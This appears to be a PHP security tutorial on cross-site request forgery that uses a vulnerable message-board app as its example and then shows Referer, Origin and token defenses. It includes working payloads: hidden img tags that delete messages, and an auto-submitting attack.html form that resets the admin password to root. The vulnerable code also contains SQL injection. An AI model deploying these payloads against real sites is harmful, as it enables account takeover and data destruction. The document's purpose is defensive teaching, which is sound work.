PHP Vulnerability Full Solution (VI): Cross-Site Request Forgery

Source: Internet
Author: User
Tags: vars, administrator, password

This article introduces cross-site request forgery (CSRF) in PHP web sites. Every CSRF attack has the same shape: the attacker forges an HTTP request that looks as if another user had initiated it. In practice the attacker's goal is to get that request sent from the target user's browser, with the target user's session.

CSRF (cross-site request forgery), also written XSRF, is an attack in which the attacker forges an HTTP request on behalf of the target user and causes the user's browser to send it to a web site that has a CSRF vulnerability; the site then executes the request as if the user had made it deliberately. The attacker hides the request behind a link or an embedded resource so that the target user triggers it without noticing. Because the target user is logged in and has legitimate rights, the forged request runs with those rights, and the attacker gets the site to perform an action the user never intended.

For example, a shopping site buys an item with the request http://www.shop.com/buy.php?item=watch&num=1, where the item parameter selects the product and the num parameter the quantity. If the attacker sends the target user a hidden link such as http://www.shop.com/buy.php?item=watch&num=1000 and the user accidentally accesses it, the purchase quantity becomes 1000.

Example: Network PHP Message Board V1.0

Deleting any message

delbook.php is the page that deletes messages:

  <?php
  include_once("dlyz.php");    // dlyz.php checks the login; only the admin is allowed to delete messages
  include_once("../conn.php");
  $del = $_GET["del"];
  $id  = $_GET["id"];
  if ($del == "data")
  {
      // Bulk delete: the selected message IDs come from the adid[] checkboxes
      $id_dele = implode(",", $_POST['adid']);
      $sql = "delete from book where id in (" . $id_dele . ")";
      mysql_query($sql);
  }
  else
  {
      // Single delete: the message ID to delete is passed in the URL
      $sql = "delete from book where id=" . $id;
      mysql_query($sql);
  }
  mysql_close($conn);
  echo "<script>";
  echo "alert('Delete succeeded!');";
  echo "location='book.php';";
  echo "</script>";
  ?>

When we are logged in with admin rights, submitting http://localhost/manage/delbook.php?id=2 deletes the message with ID 2. Nothing in the page ties the request to the admin's own intent: any request that arrives carrying the admin's session cookie is executed. (The unescaped id is also a SQL injection, but that is outside the scope of this article.)

Exploitation:

As a regular user, we post a message whose content (source) is:

    <img src="delbook.php?id=2" />
    <img src="delbook.php?id=3" />
    <img src="delbook.php?id=4" />
    <img src="delbook.php?id=5" />

This inserts four image links, each of which deletes one message by ID. Going back to the home page, nothing appears to have changed, and the pictures do not display.

Now we log in again with the administrator account and refresh the home page: only one message is left, and every message whose ID was named in an image link has been deleted.

The attacker inserted hidden image links into a message, and each link performs a delete. When the attacker (a regular user) loads those images nothing happens, because dlyz.php rejects the request for lack of permission, so no effect is visible. But when the administrator logs in and views the message, the browser fetches the hidden links with the administrator's session, and since that account has enough rights, the messages are deleted.

Modifying the administrator password

  pass.php
  <?php
  include_once("dlyz.php");
  include_once("../conn.php");
  if ($_GET["act"])
  {
      $username  = $_POST["username"];
      $sh        = $_POST["sh"];
      $gg        = $_POST["gg"];
      $title     = $_POST["title"];
      $copyright = $_POST["copyright"] . " Design and production: Xiamen Fate Network Technology";
      $password  = md5($_POST["password"]);
      if (empty($_POST["password"]))
      {
          // Empty password field: update the site settings but leave the password unchanged
          $sql = "update gly set username='" . $username . "', sh=" . $sh . ", gg='" . $gg . "', title='" . $title . "', copyright='" . $copyright . "' where id=1";
      }
      else
      {
          $sql = "update gly set username='" . $username . "', password='" . $password . "', sh=" . $sh . ", gg='" . $gg . "', title='" . $title . "', copyright='" . $copyright . "' where id=1";
      }
      mysql_query($sql);
      mysql_close($conn);
      echo "<script>";
      echo "alert('Modified successfully!');";
      echo "location='pass.php';";
      echo "</script>";
  }
  ?>

This file updates the administrator account (user name and password) and the site settings. Since nothing checks where the POST came from, we can construct the following form directly:

  <body>
  <form action="http://localhost/manage/pass.php?act=xg" method="POST" name="form1" id="form1">
  <input type="radio" value="1" name="sh">
  <input type="radio" name="sh" checked value="0">
  <input type="text" name="username" value="root">
  <input type="password" name="password" value="root">
  <input type="text" name="title" value="Online PHP message board V1.0 (with audit function)">
  <textarea name="gg" rows="6">Welcome, you have installed the Network PHP message board V1.0 (with audit function)!</textarea>
  <textarea name="copyright" rows="6">Network PHP message board V1.0 All rights reserved: Xiamen Fate Network Technology 2005-2009<br/>We undertake website construction and system customization and provide discounted hosting and domain names</textarea>
  </form>
  <!-- submit the form as soon as the page loads, so the victim needs to do nothing -->
  <script>document.getElementById("form1").submit();</script>
  </body>

Save this as attack.html and host it at http://www.sectop.com/attack.html. When the page is opened it automatically submits the form to the target's pass.php, changing the user name to root and the password to root. We then post a message on the message board that hides a link to this page; when the administrator views it, the administrator's user name and password are both changed to root.

Precautions

CSRF is harder to guard against than most other attacks: the HTTP request is constructed by the attacker but sent by the target user's browser, carrying the user's own cookies, so the server cannot tell it apart from a legitimate request by the session alone. A few common defenses:

1. Check the source of the page (the Referer header)

2. Check a built-in hidden variable (a token)

3. Use POST, not GET

Checking the page source

Add the following check at the top of pass.php, before any update is performed, to verify where the submission came from:

  <?php
  include_once("dlyz.php");
  include_once("../conn.php");
  if ($_GET["act"])
  {
      if (isset($_SERVER["HTTP_REFERER"]))
      {
          $serverhost = $_SERVER["SERVER_NAME"];
          // Take the host part of the Referer URL and compare it with our own host name
          $strurl     = str_replace("http://", "", $_SERVER["HTTP_REFERER"]);
          $strdomain  = explode("/", $strurl);
          $sourcehost = $strdomain[0];
          if (strncmp($sourcehost, $serverhost, strlen($serverhost)))
          {
              unset($_POST);
              echo "<script>";
              echo "alert('Data source exception!');";
              echo "location='index.php';";
              echo "</script>";
              exit;   // stop here; without this the update below would still run with emptied input
          }
      }
      $username  = $_POST["username"];
      $sh        = $_POST["sh"];
      $gg        = $_POST["gg"];
      $title     = $_POST["title"];
      $copyright = $_POST["copyright"] . " Design and production: Xiamen Fate Network Technology";
      $password  = md5($_POST["password"]);
      if (empty($_POST["password"]))
      {
          $sql = "update gly set username='" . $username . "', sh=" . $sh . ", gg='" . $gg . "', title='" . $title . "', copyright='" . $copyright . "' where id=1";
      }
      else
      {
          $sql = "update gly set username='" . $username . "', password='" . $password . "', sh=" . $sh . ", gg='" . $gg . "', title='" . $title . "', copyright='" . $copyright . "' where id=1";
      }
      mysql_query($sql);
      mysql_close($conn);
      echo "<script>";
      echo "alert('Modified successfully!');";
      echo "location='pass.php';";
      echo "</script>";
  }
  ?>
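The check above is weaker than it looks. strncmp compares only the first strlen($serverhost) characters, so a Referer from www.shop.com.sectop.com passes for a site at www.shop.com; the check is skipped entirely when no Referer header arrives, and an attacker's page can suppress it with a no-referrer referrer policy; and str_replace only strips http://, so a legitimate https Referer is rejected. The function below is an added example, not the message board's own code, showing the same idea done strictly: it checks the Origin header first and Referer second, extracts the host with parse_url, compares the whole host (and port) exactly, and fails closed when neither header is present. The function name and the $expected_host argument (the site's own host as configured, with port if any) are assumptions of this example, and the sample requests are constructed.

```php
<?php
// Added example: strict source check for a state-changing request.
// $server is the $_SERVER array (or a constructed copy of it);
// $expected_host is the site's own host, e.g. "www.shop.com" or "localhost:8080".

function request_origin_allowed(array $server, string $expected_host): bool
{
    // Origin is sent by browsers on cross-site POSTs and is not removed by the
    // referrer-policy tricks that suppress Referer, so it is checked first.
    $candidates = [];
    if (!empty($server['HTTP_ORIGIN'])) {
        $candidates[] = $server['HTTP_ORIGIN'];
    }
    if (!empty($server['HTTP_REFERER'])) {
        $candidates[] = $server['HTTP_REFERER'];
    }
    if ($candidates === []) {
        return false;                  // no source information at all: fail closed
    }
    $expected = strtolower($expected_host);
    foreach ($candidates as $url) {
        $host = parse_url($url, PHP_URL_HOST);
        if ($host === null || $host === false) {
            return false;              // unparsable value, or the literal "Origin: null"
        }
        $port   = parse_url($url, PHP_URL_PORT);
        $source = strtolower($host) . ($port !== null ? ":" . $port : "");
        if ($source !== $expected) {
            return false;              // every header that is present must match exactly
        }
    }
    return true;
}

// Constructed sample requests, not captured traffic.
$site    = 'www.shop.com';
$samples = [
    'same-site form'      => ['HTTP_ORIGIN'  => 'http://www.shop.com',
                              'HTTP_REFERER' => 'http://www.shop.com/manage/pass.php'],
    'attacker page'       => ['HTTP_ORIGIN'  => 'http://www.sectop.com',
                              'HTTP_REFERER' => 'http://www.sectop.com/attack.html'],
    'prefix-match bypass' => ['HTTP_REFERER' => 'http://www.shop.com.sectop.com/attack.html'],
    'no headers at all'   => [],
];
foreach ($samples as $label => $server) {
    printf("%-20s %s\n", $label, request_origin_allowed($server, $site) ? 'allowed' : 'rejected');
}
```

Run from the command line, the first sample is allowed and the other three are rejected. The third one is the case the page's strncmp check lets through, and the fourth is the case the page's check does not look at because isset($_SERVER["HTTP_REFERER"]) is false. A source check of this kind is still only a second line of defense; the token check in the next section does not depend on browser headers at all.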

Checking a built-in hidden variable

We place a hidden variable in the form and store the same value in a session variable, then check on submission that the hidden value equals the session value. Only a form rendered by our own page carries the right value, so this tells us whether the submission came from our page. The token must be generated before the form is rendered, that is, on every request and not only when act is set; otherwise the first form has no token and the first submission is rejected.

  <?php
  session_start();             // required before $_SESSION can be used
  include_once("dlyz.php");
  include_once("../conn.php");
  if (!isset($_SESSION["post_id"]))
  {
      // Generate a unique ID and hash it with MD5
      $post_id = md5(uniqid(rand(), true));
      // Create the session variable
      $_SESSION["post_id"] = $post_id;
  }
  if ($_GET["act"])
  {
      // Check for equality
      if (isset($_SESSION["post_id"]))
      {
          // Not equal
          if ($_SESSION["post_id"] != $_POST["post_id"])
          {
              // Clear the POST variables and stop before any update runs
              unset($_POST);
              echo "<script language='javascript'>";
              echo "alert('Data source exception!');";
              echo "location='index.php';";
              echo "</script>";
              exit;
          }
      }
      ......
  }
  ?>
  ......
  <input type="reset" name="Submit2" value="reset">
  <input type="hidden" name="post_id" value="<?php echo $_SESSION["post_id"]; ?>">
  </td></tr>
  </table>
  </form>
  <?php
  mysql_close($conn);
  ?>
  </body>
  </html>
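The hidden-variable check works because the attacker's page runs in a different origin and cannot read the token stored in the victim's session, so attack.html can neither copy the value nor guess it. The following is an added example, not the message board's own code, that packages the same defense in reusable functions: the token is drawn from random_bytes() instead of md5(uniqid()), the comparison uses hash_equals() so it runs in constant time, and the session array is passed in explicitly so the functions can be exercised from the command line. The function names, the sketch of how pass.php would call them, and the demonstration values are this example's own; only the post_id field name comes from the page.

```php
<?php
// Added example: synchronizer token issue/verify for every state-changing form.

function csrf_token_issue(array &$session): string
{
    // Issue one token per session and reuse it for every form on the site.
    if (empty($session['post_id'])) {
        $session['post_id'] = bin2hex(random_bytes(32));   // 64 hex characters, CSPRNG
    }
    return $session['post_id'];
}

function csrf_token_verify(array $session, $submitted): bool
{
    // Reject when no token was ever issued, when the field is missing or is not a
    // string, and when the values differ. hash_equals() keeps the comparison
    // constant-time so the token cannot be recovered byte by byte via timing.
    if (empty($session['post_id']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($session['post_id'], $submitted);
}

function hidden_token_field(string $token): string
{
    // The field to place inside every form whose submission changes state.
    return '<input type="hidden" name="post_id" value="'
        . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '">';
}

// How pass.php would use these (sketch; the database update is the page's own code):
//
//   session_start();
//   $token = csrf_token_issue($_SESSION);           // before rendering the form
//   if (isset($_GET['act'])) {
//       if (!csrf_token_verify($_SESSION, $_POST['post_id'] ?? null)) {
//           header('Location: index.php');
//           exit;                                    // never fall through to the UPDATE
//       }
//       // ... perform the update ...
//   }
//   echo '<form method="POST" action="pass.php?act=xg">' . hidden_token_field($token) . ' ... </form>';

// Constructed demonstration with an in-memory "session" array.
$session = [];
$token   = csrf_token_issue($session);
echo "issued token:  $token\n";
echo "own form:      ", csrf_token_verify($session, $token) ? "accepted" : "rejected", "\n";
echo "attack.html:   ", csrf_token_verify($session, null) ? "accepted" : "rejected", "\n";   // attacker's form has no token
echo "guessed token: ", csrf_token_verify($session, str_repeat('0', 64)) ? "accepted" : "rejected", "\n";
echo "reissue:       ", csrf_token_issue($session) === $token ? "same token reused" : "token changed", "\n";
```

Run from the command line, the page's own form is accepted, the attacker's form (which cannot include the token) and a guessed token are rejected, and a second call to csrf_token_issue() returns the same token, so every form on the site can share it for the life of the session. The hidden field is HTML-escaped when rendered; the token itself is hex, but escaping it keeps the helper safe for any value placed in an attribute.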

Use POST, not GET

When passing form fields, use POST rather than GET, and read them from $_POST rather than $_REQUEST (which also accepts GET and cookie values). Note that POST alone does not stop CSRF: the attack.html page above submits a POST form automatically. It only rules out the one-line img and link variants and keeps sensitive parameters out of URLs and access logs, so it must be combined with the Referer or token check.
